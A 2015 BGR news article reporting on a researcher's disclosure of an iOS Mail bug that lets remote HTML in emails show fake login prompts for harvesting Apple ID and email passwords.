Click to Skip Ad
Closing in...

Warning: Major iPhone security flaw makes it painfully easy to steal your password

Published Jun 10th, 2015 10:18AM EDT
iPhone Security Flaw
Image: Zach Epstein, BGR

If you buy through a BGR link, we may earn an affiliate commission, helping support our expert product labs.

Apple’s iOS platform is one of the most secure mobile operating systems in the world, and each release brings new security features and enhancements. iPhones and iPads are proliferating in the workplace at a rapid pace, and even spy agencies tend to have difficulties cracking encrypted communications that originate on an iOS device.

But no software is without flaws, and a new security vulnerability makes iPhones and iPads painfully vulnerable to phishing scams that can easily allow someone to steal your Apple ID username and password.

DON’T MISS: New update brings the best Google Maps feature iOS has seen in months – here’s how to use it

Ernst and Young security researcher Jan Soucek has built a tool the likes of which could easily trick iPhone and iPad users into handing over the usernames and passwords tied to their email accounts or even Apple IDs.

As noted by The Register, Soucek’s tool takes advantage of a potential flaw in Apple’s iOS Mail app that automatically loads remote HTML content. The researcher has simply created HTML pop-ups that look exactly like the dialog box that appears when an iOS device requires the user to reenter his or her email credentials or Apple ID.

Unsuspecting victims are so used to seeing these dialog boxes, that the odds are good they would just enter their email addresses and passwords without thinking twice. Once this sensitive information is entered and the user taps OK, his or her credentials are sent to a remote server where hackers can access them.

“Back in January 2015 I stumbled upon a bug in iOS’s mail client, resulting in HTML tag in e-mail messages not being ignored,” Soucek said on the GitHub page hosting his project. “This bug allows remote HTML content to be loaded, replacing the content of the original email message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS. It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2.”

As noted by the researcher, Apple has yet to address the issue.

Zach Epstein
Zach Epstein Executive Editor

Zach Epstein has been the Executive Editor at BGR for more than 15 years. He manages BGR’s editorial team and ensures that best practices are adhered to. He also oversees the Ecommerce team and directs the daily flow of all content. Zach first joined BGR in 2007 as a Staff Writer covering business, technology, and entertainment.

His work has been quoted by countless top news organizations, and he was recently named one of the world's top 10 “power mobile influencers” by Forbes. Prior to BGR, Zach worked as an executive in marketing and business development with two private telcos.